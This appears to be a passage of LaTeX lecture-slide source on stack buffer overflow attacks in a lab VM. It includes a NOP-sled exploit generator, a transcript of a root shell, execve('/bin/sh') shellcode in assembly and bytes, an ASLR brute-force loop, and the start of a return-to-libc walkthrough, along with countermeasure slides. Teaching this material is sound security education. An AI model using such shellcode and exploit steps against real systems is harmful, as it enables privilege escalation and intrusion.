\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=Cerulean,minimum height=0.425cm] at (2,5.76) {\texttt{NOP}};

\draw[<-] (4.1,0) -- (5,0) node[anchor=west] {Start of \texttt{buffer}};
\draw[<-] (4.1,6.5) -- (5,6.5) node[anchor=west] {\texttt{rbp + 8}};
\draw[<-] (4.1,8) -- (5,8) node[anchor=west] {\texttt{rbp + 16}};

\draw [decorate,decoration={brace,amplitude=10pt},xshift=-4pt] (-0.1,0) -- (-0.1,6.5) node [black,midway,xshift=-0.6cm] {$\Delta$};
\draw[->] (-1,7.25) node[anchor=east, text width=3cm, text centered] {What we write here will overwrite the return address} -- (-0.1,7.25);

\draw[->] (-1,13) node[anchor=east, text width=3cm, text centered] {First possible entry point of our program} to[out=0,in=180] (-0.1,8.74);

\draw (0,15.5) -- (4,15.5);
\draw (0,12.45) -- (4,12.45);
\draw (0,8) -- (4, 8);
\draw (0,6.5) -- (4, 6.5);
\draw (0,0) -- (4,0);

\draw (0,0) -- (0,16);
\draw (4,0) -- (4,16);
\draw[dashed] (0,0) -- (0,-1);
\draw[dashed] (4,0) -- (4,-1);
\draw[dashed] (0,16) -- (0,17);
\draw[dashed] (4,16) -- (4,17);
\end{tikzpicture}
\end{center}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Using \texttt{gdb}}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ gcc -z execstack -fno-stack-protector -g -o overflog overflow.c
ssd@ssd-vb:~$ touch badfile
ssd@ssd-vb:~$ gdb overflog
GNU gdb (Ubuntu/Linaro 7.4.2012-04-0ubuntu2.1) 7.4-2012.04
...
(gdb) b copy_stuff
Breakpoint 1 at 0x80484ed: file overflow.c, line 10.
(gdb) run
Starting program /home/ssd/Documents/ssd-buffer-overflow/overflog

Breakpoint 1, copy_stuff (str=0xbffff18c "...") at overflow.c:10
10		strcpy(buffer, str)
(gdb) p $ebp
$1 = (void*) 0xbffff168
(gdb) p &buffer
$2 = (char (*)[100]) 0xbffff0fc
(gdb) p 0xbffff168 - 0xbffff0fc
$3 = 108
(gdb) quit
...
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{Writing \texttt{badfile}}
\begin{itemize}[<+->]
\item Basically, we want to execute \texttt{/bin/sh}
	\begin{itemize}
	\item That is what we want to load onto the stack
	\item We also want to call \texttt{execve}
	\end{itemize}
\item We need to load code associated with this step on the stack
	\begin{itemize}
	\item This is called a \emph{shell code}
	\end{itemize}
\item We also want to fill everything else with \texttt{NOP}
\item We do \emph{not} want to enter on \texttt{rbp + 16}
	\begin{itemize}
	\item That address was identified using \texttt{gdb}
	\item The stack frame will most likely different
	\item \texttt{gdb} adds information, at the beginning
	\item We have to \texttt{jmp} higher	
	\end{itemize}
\item The address after the shift we use to jump cannot contain a zero byte
	\begin{itemize}
	\item Otherwise, \texttt{strcpy} will stop prematurely
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Our malicious code}
\begin{itemize}
\item File \texttt{malicious.c}
\end{itemize}
\begin{lstlisting}
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

const char shellcode[] = ... ; //goal of what we write here : run arbitrary command

int main()
{
	char buffer[200];
	
	//fill buffer with NOP
	memset(&buffer, 0x90, 200);
	
	//guess a valid entry point
	*((long*) buffer + 112) = 0xbffff168 + 0x90; //0x90 is chosen with trial and fail
	
	//put the shellcode after buffer
	memcpy(buffer + sizeof(buffer) - sizeof(shellcode),
			shellcode, sizeof(shellcode));
			
	//output
	FILE * badfile = fopen("./badfile", "w");
	fwrite(buffer, 200, 1, badfile);
	fclose(badfile);
}
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Running the attack}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ rm badfile
ssd@ssd-vb:~$ gcc -o malicious malicous.c
ssd@ssd-vb:~$ ./malicious
ssd@ssd-vb:~$ ./overflow
#
# id
uid=0(root) gid=1000(ssd) groups=0(root), ...
\end{lstlisting}
\end{frame}

\section{Writing a shell code}

\begin{frame}
\frametitle{I shall grant you three wishes}
\begin{itemize}[<+->]
\item We want to run an arbitrary command
\item We would very much like that command to be \texttt{/bin/sh}
\item We want to launch it with the \texttt{execve} system call
\end{itemize}
\begin{exampleblock}<+->{Naïve idea}
	\begin{itemize}[<+->]
	\item Write a \texttt{C} code launching \texttt{execve} on \texttt{/bin/sh}
	\item Compile it
	\item Input the binary code as \texttt{badfile}
	\end{itemize}
\end{exampleblock}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example}
\begin{itemize}
\item File \texttt{naive.c}
\end{itemize}
\begin{lstlisting}
#include <unistd.h>

int main()
{
	char * cmd[2] = {"/bin/sh", NULL};
	execve(cmd[0], cmd, NULL);
}
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{Why it doesn't work}
\begin{enumerate}[<+->]
\item Loader issue
	\begin{itemize}
	\item Any program is loaded and its environment set up before execution
	\item Performed by the OS Loader (setting stack and heap, copying program into memory, calling dynamic linker, etc.)
	\item After loading, \texttt{main} is called
	\item Here, the malicious code is \emph{not} loaded by the OS
	\end{itemize}
\item Zéros
	\begin{itemize}
	\item At least the \lstinline|'\\0'| of \lstinline|"/bin/sh"| and \lstinline|NULL|
	\item Will stop \texttt{strcpy} prematurely
	\end{itemize}
\end{enumerate}
\end{frame}

\begin{frame}
\frametitle{Main idea}
\begin{itemize}[<+->]
\item Write the program directly using assembly language
\item The binary code associated with that program is called a shellcode\footnote{One, A. : Smashing the stack for fun and profit - \emph{Phrack 7}:49 - 1996}
\item The basic idea is to set up registers to use the \texttt{execve} system call
	\begin{itemize}
	\item With proper parameters
	\end{itemize}
\end{itemize}
\begin{exampleblock}<+->{Parameters in x86}
	\begin{enumerate}[<+->]
	\item \texttt{eax} : service number
		\begin{itemize}
		\item The number for \texttt{execve} is \texttt{11}
		\end{itemize}
	\item \texttt{ebx}, \texttt{ecx}, \texttt{edx} : parameters
		\begin{itemize}
		\item \texttt{ebx} : the address of \lstinline|"/bin/sh"|
		\item \texttt{ecx} : address of the argument array
		\item \texttt{edx} : environment variables (not needed here)
		\end{itemize}
	\end{enumerate}
\end{exampleblock}
\end{frame}

\begin{frame}
\frametitle{Setting \texttt{ebx}}
\begin{itemize}[<+->]
\item To find the address of \lstinline|"/bin/sh"|
	\begin{itemize}
	\item We push it on the stack
	\item We deduce its address from \texttt{esp}
	\end{itemize}
\item We don't want to induce a zero in the code
	\begin{enumerate}
	\item \texttt{xor eax, eax} sets rax to zero without inducing a zero int he code
		\begin{itemize}
		\item We can't write \texttt{mov eax, 0}
		\end{itemize}
	\item \texttt{push eax} : put \lstinline|\0| of \lstinline|"/bin/sh"|
	\item \texttt{push 0x68732F2F} : put \lstinline|"//sh"| on the stack
		\begin{itemize}
		\item We write an additional \texttt{/} because we need 4 bytes
        \item Bytes are reversed because x86 uses little-indian
		\end{itemize}
	\item \texttt{push 0x6e69622F} : put \lstinline|"/bin"| on the stack
	\item \texttt{mov esp, ebx}
	\end{enumerate}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Setting \texttt{ecx}}
\begin{itemize}[<+->]
\item We use the same technique as the one used for \lstinline|"/bin/sh"|
\item Push it on the stack and deduce the address
	\begin{enumerate}
	\item \texttt{push eax} : push the second element of \texttt{cmd}.
		\begin{itemize}
		\item It is zero, so we can still push \texttt{eax}
		\end{itemize}
	\item \texttt{push ebx} : push the address of \lstinline|"/bin/sh"|
		\begin{itemize}
		\item \texttt{ebx} has that address now, so we use it
		\end{itemize}
	\item \texttt{mov esp, ecx} : set \texttt{ecx} to contain the address of the \texttt{cmd} array
	\end{enumerate}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Final touches}
\begin{enumerate}[<+->]
\item Set \texttt{edx} to zero
	\begin{itemize}
	\item We can \texttt{xor} it with itself
	\item We can also use \texttt{cdq} (convert double to quad) that has the side effect of setting \texttt{edx} to zero with a single byte instruction
	\end{itemize}
\item Calling \texttt{execve} in x86
	\begin{itemize}
	\item The op code of \texttt{execve} is $11$
	\item \texttt{mov byte eax, 11}    
	\item Call interruption with \texttt{int 0x80}
	\end{itemize}
\item We still need to find out what the binary code for all of these steps is
\end{enumerate}
\end{frame}

\begin{frame}
\frametitle{Execution of our shellcode}
\begin{center}
\begin{tikzpicture}[yscale=.4,scale=.85]
\node[inner sep=0pt, minimum width=3.2cm, fill=red!70,minimum height=0.85cm] at (2,14) {\footnotesize Malicious code};

\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=Cerulean,minimum height=0.425cm] at (2,8.74) {\texttt{NOP}};
\node at (2,10.5) {$\vdots$};
\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=Cerulean,minimum height=0.425cm] at (2,11.7) {\texttt{NOP}};

\node[inner sep=0pt, minimum width=3.2cm, fill=red!70,minimum height=0.425cm] at (2,0.8) {};
\node at (2, 0.8) {\texttt{0x2000}};

\node at (2,7.2) {\texttt{0}};
\node at (2,5.6) {\texttt{//sh}};
\node at (2,4) {\texttt{/bin}};
\node at (2,2.4) {\texttt{0}};

\node at (-1.25,4) {\texttt{0x2000}};

\draw[<-] (-0.1,0.53) -- (-1, 0.53) node[left] {\texttt{rsp}};
\draw[->, thick, red!70] (-0.1,1.06) to[out=120,in=-120] (-0.1,4);
\node[draw,right,minimum size=.5cm,label={right:\texttt{rax}}] at (5.1,7.2) {$11$};
\draw[->] (4.1,0.8) -- (5.1,0.8) node[draw,right,minimum size=.5cm,label={right:\texttt{rbx}}] {};
\draw[->] (4.1,4) -- (5.1,4) node[draw,right,minimum size=.5cm,label={right:\texttt{rcx}}] {};
\node[draw,right,minimum size=.5cm,label={right:\texttt{rbx}}] at (5.1,-2.4) {$0$};

\draw (0,15.5) -- (4,15.5);
\draw (0,12.45) -- (4,12.45);
\draw (0,8) -- (4, 8);
\draw (0,6.4) -- (4, 6.4);
\draw (0,4.8) -- (4,4.8);
\draw (0,3.2) -- (4,3.2);
\draw (0,1.6) -- (4,1.6);
\draw (0,0) -- (4,0);

\draw (0,0) -- (0,16);
\draw (4,0) -- (4,16);
\draw[dashed] (0,0) -- (0,-1);
\draw[dashed] (4,0) -- (4,-1);
\draw[dashed] (0,16) -- (0,17);
\draw[dashed] (4,16) -- (4,17);
\end{tikzpicture}
\end{center}
\end{frame}

\begin{frame}
\frametitle{Correspondence between assembly and binary}
\begin{itemize}
\onslide<1->{\item Any assembly instruction can be directly mapped to binary code}
\end{itemize}
\begin{center}
\visible<2->{
\begin{tikzpicture}[scale=.7]
\foreach \i in {0,...,15}
	\draw (\i,0) rectangle (\i+1,1);
	
\draw [decorate,decoration={brace,amplitude=10pt,mirror}] (0.1,-0.2) -- (3.9,-0.2) node [black,midway,yshift=-0.6cm] {Prefix};
\draw [decorate,decoration={brace,amplitude=10pt,mirror}] (4.1,-0.2) -- (5.9,-0.2) node [black,midway,yshift=-0.6cm] {Op code};

\draw[->] (6.5,-0.2) -- (6.5, -1.25) node[below] {ModR.M};
\draw[->] (7.5,-0.2) to[out=-90,in=90] (8.5, -1.75) node[below] {SIB};

\draw [decorate,decoration={brace,amplitude=10pt,mirror}] (8.1,-0.2) -- (11.9,-0.2) node [black,midway,yshift=-0.6cm] {Shift};
\draw [decorate,decoration={brace,amplitude=10pt,mirror}] (12.1,-0.2) -- (15.9,-0.2) node [black,midway,yshift=-0.6cm] {Immediate};

\node at (8,2) {Only the first Op code byte is mandatory};
\end{tikzpicture}}
\begin{itemize}
\onslide<3->{\item We need to find the binary code of the code preparing the data}
\onslide<4->{\item We will use that as our shell code}
\end{itemize}
\end{center}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{The assembly code}
\begin{itemize}
\item Code in 32 bits : because so is our VM
\item We need to push \lstinline|/bin/sh| in two steps
	\begin{itemize}
	\item We can only push 4 bytes at a time on the stack
	\end{itemize}
\end{itemize}
\begin{lstlisting}[style=asm]
xor eax, eax       ; 31 C0
push eax           ; 50
push 0x68732F2F    ; 68 2F 2F 73 68 -> push "//sh"
push 0x6e69622F    ; 68 2F 62 69 6E -> push "/bin"
mov esp, ebx       ; 89 E3
push eax           ; 50
push ebx           ; 53
mov esp, ecx       ; 89 E1
cdq                ; 99
mov byte 0x0b, al  ; B0 0B          -> mov eax, 11
int 0x80           ; CD 80
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Our shellcode in \texttt{C}}
\begin{itemize}
\item File \texttt{malicious.c}
\end{itemize}
\begin{lstlisting}
char shellcode[] =
	"\x31\xc0"             /* xor eax, eax */
	"\x50"                 /* push eax */
	"\x68""//sh"           /* push 0x68732F2F */
	"\x68""/bin"           /* push 0x6e69622F */
	"\x89""\xe3"           /* mov esp, ebx */
	"\x50"                 /* push eax */
	"\x53"                 /* push ebx */
	"\x89\xe1"             /* mov esp, ecx */
	"\x99"                 /* cdq */
	"\xb0\x0b"             /* move byte 11, al */
	"\xcd\x80"             /* int 0x80 */
;
\end{lstlisting}
\end{frame}

\section{Countermeasures}

\begin{frame}
\frametitle{Use safer functions}
\begin{itemize}[<+->]
\item Some memory copy functions rely on special characters to decide when to stop
	\begin{itemize}
	\item \texttt{strcpy}, \texttt{sprintf}, \texttt{strcat}, etc. stop on \lstinline|'\\0'|
	\end{itemize}
\item Dangerous, because the length to be copied is decided by the input
\item The input is under the control of the user
\item Safer approach : explicitly require the length to copy
	\begin{itemize}
	\item Based on the target buffer
	\item Under the control of the developer
	\end{itemize}
\item Use \texttt{strncpy}, \texttt{snprintf}, \texttt{strncat}, etc.
\item This is relatively safer
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Safer dynamic linking}
\begin{itemize}[<+->]
\item Safer use of functions require to change to the program
\item If we only have the binary, making changes can be hard
\item Alternate approach : hijack through dynamic linker
\item There exist safer dynamic linkers than the default ones
	\begin{itemize}
	\item Slower
	\item Require additional deployment steps
	\end{itemize}
\item Example : \texttt{libsafe} instead of \texttt{libc} (Bell Labs)
	\begin{itemize}
	\item Provides bound checking, no copying beyond frame pointer, etc.
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Program static analyser}
\begin{itemize}[<+->]
\item Instead of preventing buffer overflow by design, we analyse the syntax of the code
\item Warns the developers if some patterns may lead to buffer overflow
\item Usually implemented with an engine launched with a command line interface
\item Goal : notify early in the development stages that some code sample is vulnerable
\item Example : \texttt{ITS4} (Cigigal) in \texttt{C} / \cpp
\item There is a large number of scientific publications about this
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Programming language}
\begin{itemize}[<+->]
\item Developers rely on programming languages to develop their programs
\item The language itself can make checks to prevent buffer overflow
\item Removes some burden from developers
\item Several programming languages provide bound checking
	\begin{itemize}
	\item \texttt{Java}, \texttt{Python}, etc.
	\end{itemize}
\item These languages are considered safer to prevent buffer overflow
\item Usually : a tradeof
	\begin{itemize}
	\item \texttt{Java} is terrible against data remanence
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Compilers}
\begin{itemize}[<+->]
\item Compilers are responsible to translate source code into binary
\item They control what will eventually become the executable
\item They can implicitly insert data to 
	\begin{itemize}
	\item check stack integrity
	\item eliminate conditions necessary for buffer overflow
	\end{itemize}
\item Two main compiler-based countermeasures
	\begin{itemize}
	\item Stackshield\footnote{Angelfire.com - 2000}
	\item StackGuard\footnote{Cowa \emph{et al} - 1998} (canaries)
	\end{itemize}
\item Idea behind Stackshield : store a backup of the return address at a safer place
	\begin{itemize}
	\item That safer place cannot be overflown
	\item When hitting return, we chack that the return address is the same as the backup
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Operating system}
\begin{itemize}[<+->]
\item Before a program is executed, it needs to be loaded
\item The environment needs to be set up
\item This stage offers opportunity to counter buffer overflow
	\begin{itemize}
	\item It is here that we dictate how memory is laid out
	\end{itemize}
\item Common countermeasure : Address space layout randomisation
	\begin{itemize}
	\item Reduces the chances of buffer overflow
	\item Makes it harder to guess addresses of the injected code
	\item Randomises the layout of the program memory
	\end{itemize}
\item Can be bypassed without some effort
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Hardware}
\begin{itemize}[<+->]
\item Our attack relies on executing the shellcode
\item That shellcode is loaded on the stack
\item Most CPU support a feature called \texttt{NX} bit
	\begin{itemize}
	\item No eXecute
	\end{itemize}
\item Separates code from data (principle of isolation)
\item OSes mark some memory areas as non executable
\item The CPU will refuse to execute stuff stored in these areas
	\begin{itemize}
	\item Will not "parse" these as code
	\end{itemize}
\item Can be countered with some effort
\end{itemize}
\end{frame}

\section[ASLR]{Defeating address randomisation}

\begin{frame}
\frametitle{The need for information}
\begin{itemize}[<+->]
\item We need to know the address of the injected code
	\begin{itemize}
	\item Otherwise, we don't know what to override the return address with
	\item In that case, the target program will not jump to the malicious code
	\end{itemize}
\item For that purpose, we need to know the location of the stack
\item In the past, most OSes put the stack at a fixed location
	\begin{itemize}
	\item In that case, guesses are easy
	\end{itemize}
\item Actually, the stack don't need to be at a fixed location
\item When a compiler generates a binary, the addresses of variables are not hard-coded
	\begin{itemize}
	\item Deduced from \texttt{rbp} and \texttt{rsp}
	\item Represented with the offset of one of these registers
	\end{itemize}
\item If \texttt{rbp} and \texttt{rsp} are properly set up, they are enough
\item However, an attacker has to guess the absolute address
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{The point of ASLR}
\begin{itemize}[<+->]
\item If the location of the start of the stack is randomised, guesses are hard
	\begin{itemize}
	\item But the program behaviour is unchanged
	\end{itemize}
\item Basic purpose of address space layout randomisation
	\begin{itemize}
	\item Makes the start of stack and heap random
	\end{itemize}
\item Usually implemented by the loader that sets up memory for a program
	\begin{itemize}
	\item In particular, the stack and the heap
	\end{itemize}
\item On Linux, usually implemented in the \texttt{ELF} loader
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Illustration}
\begin{itemize}
\item In the following code, we print the addresses of two 12-bytes buffers
	\begin{itemize}
	\item One allocated on the stack, the other one on the heap
	\end{itemize}
\item File \texttt{aslr.c}
\end{itemize}
\begin{lstlisting}
#include <stdio.h>
#include <stdlib.h>

int main()
{
	char on_stack[12];
	char * on_heap = malloc(12 * sizeof(char));

	printf("Address of stack-allocated buffer : %p\n", on_stack);	
	printf("Address of heap-allocated buffer  : %p\n", on_heap);
}
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Effects of ASLR}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ sudo sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space=0
ssd@ssd-vb:~$ ./aslr
Address of stack-allocated buffer : 0xbffff380
Address of heap-allocated buffer  : 0x804b008
ssd@ssd-vb:~$ ./aslr
Address of stack-allocated buffer : 0xbffff380
Address of heap-allocated buffer  : 0x804b008

ssd@ssd-vb:~$ sudo sysctl -w kernel.randomize_va_space=1
kernel.randomize_va_space=1
ssd@ssd-vb:~$ ./aslr
Address of stack-allocated buffer : 0xbfc89a20
Address of heap-allocated buffer  : 0x804b008
ssd@ssd-vb:~$ ./aslr
Address of stack-allocated buffer : 0xbfb35d70
Address of heap-allocated buffer  : 0x804b008

ssd@ssd-vb:~$ sudo sysctl -w kernel.randomize_va_space=2
kernel.randomize_va_space=2
ssd@ssd-vb:~$ ./aslr
Address of stack-allocated buffer : 0xbfd33320
Address of heap-allocated buffer  : 0x9bf6008
ssd@ssd-vb:~$ ./aslr
Address of stack-allocated buffer : 0xbf88be20
Address of heap-allocated buffer  : 0x9cb4008
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{Effectiveness of ASLR}
\begin{itemize}[<+->]
\item If we locate all areas of a process randomly, we can run into compatibility issues
\item The addresses available for randomisation have reduced range
\end{itemize}
\begin{exampleblock}<+->{Entropy}
	\begin{itemize}[<+->]
	\item $n$ bits of entropy means there are $2^n$ possible locations
	\item Uniformly distributed
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item On 32-bits Linux, static\footnote{Only program image is not random} ASLR has
	\begin{itemize}
	\item $19$ bits of entropy for the stack
	\item $13$ bits of entropy for the heap
	\end{itemize}
%\item If entropy is low, brute force attack may succeed
\item Possible countermeasure : prevent executions for some time after successive crashes
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{When in doubt, use brute force}
\begin{itemize}
\item On 32-bits Linux machines\footnote{Our VM is 32-bits}, stack only has 19 bits of entropy
\item $2^{19} = 524\,288$ : not that high
\item $\heartsuit$ Brute force $\heartsuit$
\end{itemize}
\begin{lstlisting}[style=bash]
while[1]
	do
	./overflow
done
\end{lstlisting}
\begin{itemize}
\item It took only $21$ minutes for the script to get a root shell
\item While inefficient on modern computers and smartphones, it works nicely on several other devices
\end{itemize}
\end{frame}

\section[Non executable stack]{Defeating non executable stack}

\begin{frame}
\frametitle{Executing the stack}
\begin{itemize}[<+->]
\item In typical stack buffer overflow attacks, attackers place a piece of malicious code on the stack
\item Then they overflow the return address of a function
\item When that function returns, it jumps to the malicious code
\item If the stack if set as not executable, the malicious code cannot run
\item It is the case in most x86 programs
	\begin{itemize}
	\item We can mark parts of the memory as non executable
	\item In particular : the stack
	\end{itemize}
\item In GCC, controlled by the \texttt{-z execstack} and \texttt{-z noexecstack} options
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Illustration}
\begin{enumerate}
\item We load a shellcode onto the stack
\item We cast it as a function and call it
\end{enumerate}
\begin{itemize}
\item File \texttt{dont-do-this-at-home.c}
\end{itemize}
\begin{lstlisting}
#include <string.h>

const char shellcode[] = 
	"\x31\xc0\x50\x68//sh\x68/bin"
	"\x89\xe3\x50\x53\x89\xe1\x99"
	"\xb0\x0b\xcd\x80";

int main()
{
	char buffer[sizeof(shellcode)];
	strcpy(buffer, shellcode);

	void (*f)() = (void (*)())buffer; //living the dream
	f();
}
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Result}
\begin{itemize}
\item It looks effective
\end{itemize}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ gcc -z execstack -o dont-do-this-at-home dont-do-this-at-home.c
ssd@ssd-vb:~$ ./shell-stack
$
$ exit
ssd@ssd-vb:~$ ssd@ssd-vb:~$ gcc -o dont-do-this-at-home dont-do-this-at-home.c
ssd@ssd-vb:~$ ./shell-stack
Segmentation fault (core dumped)
\end{lstlisting}
\begin{exampleblock}<+->{Rethorical question}
	\begin{itemize}
	\item Does the code we jump on need to be loaded on the stack?
	\end{itemize}
\end{exampleblock}
\end{frame}

\begin{frame}
\frametitle{Relative effectiveness}
\begin{itemize}[<+->]
\item If the stack is set as non executable, we need to find another memory area to jump on
\item That area must be executable
\item We need an "interesting" code to be stored there
\item Let us target the place where the \texttt{C} library lies
	\begin{itemize}
	\item In Linux : \texttt{libc}
	\item Dynamic library
	\end{itemize}
\item Most programs use functions inside this library
\item There are good chances the library will be loaded before they run
\item We want to find a function to achieve our goal
	\begin{itemize}
	\item The \texttt{system} function
	\item Execute \texttt{/bin/sh}
	\end{itemize}
\item This attack is named "return to \texttt{libc} attack"
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{What are we doing tonight, Brainiac?}
\begin{itemize}[<+->]
\item The goal is to jump to the \texttt{system} function
\item Call \lstinline|system("bin/sh")|
\item The plan is to
	\begin{enumerate}
	\item Find the address of \texttt{system}
		\begin{itemize}
		\item We will overwrite the return address of the vulnerable function with it
		\item Like this, we will jump to \texttt{system}
		\end{itemize}
	\item Find the address of the \lstinline|"/bin/sh"| string
		\begin{itemize}
		\item Like this, we can use it as argument of \texttt{system}
		\end{itemize}
	\item We need to pass \lstinline|"/bin/sh"| as argument to \texttt{system}
		\begin{itemize}
		\item We will load this address on the stack
		\item Find out where to put it
		\end{itemize}
	\end{enumerate}
\item The first two steps are rather easy
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Step 1: find the address of \texttt{system}}
\begin{itemize}[<+->]
\item In \texttt{Linux}, when a program runs, the \texttt{libc} library will be loaded in memory
\item Always at the same location
\item We can find the address of \texttt{system} with \texttt{dbg} 
\item We debug \texttt{overflow.c}
	\begin{itemize}
	\item We don't need debugging info here
	\end{itemize}
\item It is set-uid : the privileges will be dropped when debugging
	\begin{itemize}
	\item But we don't care
	\end{itemize}
\item Later on, we will need the address of the \texttt{exit} function
\item We print the address of these two functions with the \texttt{p} command
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Illustration}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ touch badfile
ssd@ssd-vb:~$ gdb overflow
...
(gdb) run
Starting program /home/ssd/Documents/ssd-buffer-overflow/overflow
Alright
...
(gdb) p system
$1 {<text variable, no debug info>} 0xb75b1460 <system>
(gdb) p exit
$2 {<text variable, no debug info>} 0xb75a4fe0 <system>
(gdb) quit
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{Step 2: find the address of \texttt{"/bin/sh"}}
\begin{itemize}[<+->]
\item To run \texttt{/bin/sh}, the string \lstinline|"/bin/sh"| must be in memory
\item Its address must be passed to system
\item We can
	\begin{itemize}
	\item place the string in the buffer when we overflow
		\begin{itemize}
		\item We then figure out its address
		\end{itemize}
	\item load it with environment variables
		\begin{itemize}
		\item We export a custom environment variable
		\item All environment variables are passed to children in shell processes
		\item We can get a program to print the address of that variable
		\end{itemize}
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Illustration}
\begin{itemize}
\item File \texttt{envaddr.c}
\end{itemize}
\begin{lstlisting}
#include <stdio.h>
#include <unistd.h>

int main()
{
	char * shell = (char*) getenv("MYSHELL");
	
	if(shell)
	{
		printf("Value   : %s\n", shell);
		printf("Address : %p\n", shell);
	}
}
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Result}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ gcc -o envaddr_ envaddr.c
ssd@ssd-vb:~$ export MYSHELL="/bin/sh"
ssd@ssd-vb:~$ ./envaddr_
Value   : /bin.sh
Address : 0xbffffe83
\end{lstlisting}
\begin{itemize}
\item Changing the file name changes the address
\end{itemize}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ mv envaddr endaddrlonger
ssd@ssd-vb:~$ ./envaddrlonger
Value   : /bin/sh
Address : 0xbffffe7b
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Why it happens}
\begin{itemize}
\item Environment variables are stored on the stack
\item Before they are pushed, the name of the program is pushed
	\begin{itemize}
	\item Consequently, the length of the name affects the location of the environment variables
	\end{itemize}
\end{itemize}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ gcc -g -o envaddr_dbg envaddr.c
ssd@ssd-vb:~$ gdb envaddr_gdb
...
(gdb) b main
breakpoint 1 at 0x804841d : file envaddr.c, line 6
(gdb) run
Starting program ...
Breakpoint 1, main() at envaddr.c:6
(gdb) x/100s *((char**)environ)
0xbffff552: "SSH_AGENT_PID=1561"
0xbffff564: "GPG_AGENT_INFO=/tmp/keyring-xNwnYB/gpg:0:1" 
0xbffff59c: "SHELL=/bin/sh"
...
0xbfffffc8: "/home/ssd/envaddr_dbg"
\end{lstlisting}
\begin{itemize}
\item If we change the length of the program name, we observe that all the addresses of environment variables are shifted
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Step 3 : pass \texttt{"/bin/sh"} as argument to \texttt{system}}
\begin{itemize}[<+->]
\item We cannot proceed directly as we did in the previous shell code
\item When we call a function, we
	\begin{itemize}
	\item prepare arguments
		\begin{itemize}
		\item x86 : push everything on the stack
		\item x64 : only push arguments above 6
		\end{itemize}
	\item prepare the stack frame
	\end{itemize}
\item Arguments pushed on the stack can be recovered from \texttt{rbp}
	\begin{itemize}
	\item x86 : first argument at \texttt{ebp} + 8
	\item x64 : seventh argument at \texttt{rbp} + 16
	\end{itemize}
\item Here, we are not going to "properly" call \texttt{system}
\item We need will need to manually push the address of \lstinline|"/bin/sh"|
	\begin{itemize}
	\item Or \texttt{mov} it to \texttt{rdi} in x64
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{The tricky part}
\begin{itemize}[<+->]
\item We also need to handle the stack frame manually : 
	\begin{enumerate}
	\item prepare the stack for our function (local variables, etc.)
	\item restore the stack to the state it was before \lstinline[style=asm]|call|
	\end{enumerate}
\item When a function is called
	\begin{enumerate}
	\item \texttt{rbp} is always pushed
		\begin{itemize}
		\item \lstinline[style=asm]|push rbp|
		\end{itemize}
	\item \texttt{rbp} is affected to \texttt{rsp}
		\begin{itemize}
		\item \lstinline[style=asm]|mov rsp, rbp|
		\end{itemize}
	\item a space of $n$ bytes is allocated for local variables
		\begin{itemize}
		\item \lstinline[style=asm]|sub rsp, n|
		\end{itemize}
	\end{enumerate}
\item When a function ends, 
	\begin{enumerate}
	\item registers are restored back to their values before \lstinline|call|
		\begin{itemize}
		\item \lstinline[style=asm]|mov rbp, esp|
		\item \lstinline[style=asm]|pop rbp|
		\end{itemize}
	\item we hit return
		\begin{itemize}
		\item \lstinline[style=asm]|ret|
		\end{itemize}
	\end{enumerate}
\item The instructions \lstinline[style=asm]|enter N, 0| and \lstinline[style=asm]|leave| do this as well
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example}
\begin{itemize}
\item File \texttt{function.c}
\end{itemize}
\begin{lstlisting}
void foo(int x)
{
	int a;
	a = x;
}

void stuff()
{
	int b = 5;
	foo(b);
}
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Assembly code}
\begin{lstlisting}[style=asm]
...

foo:
	pushl %ebp
	movl %esp, %ebp
	subl $16, %esp
	
	movl 8(%rbp), %eax
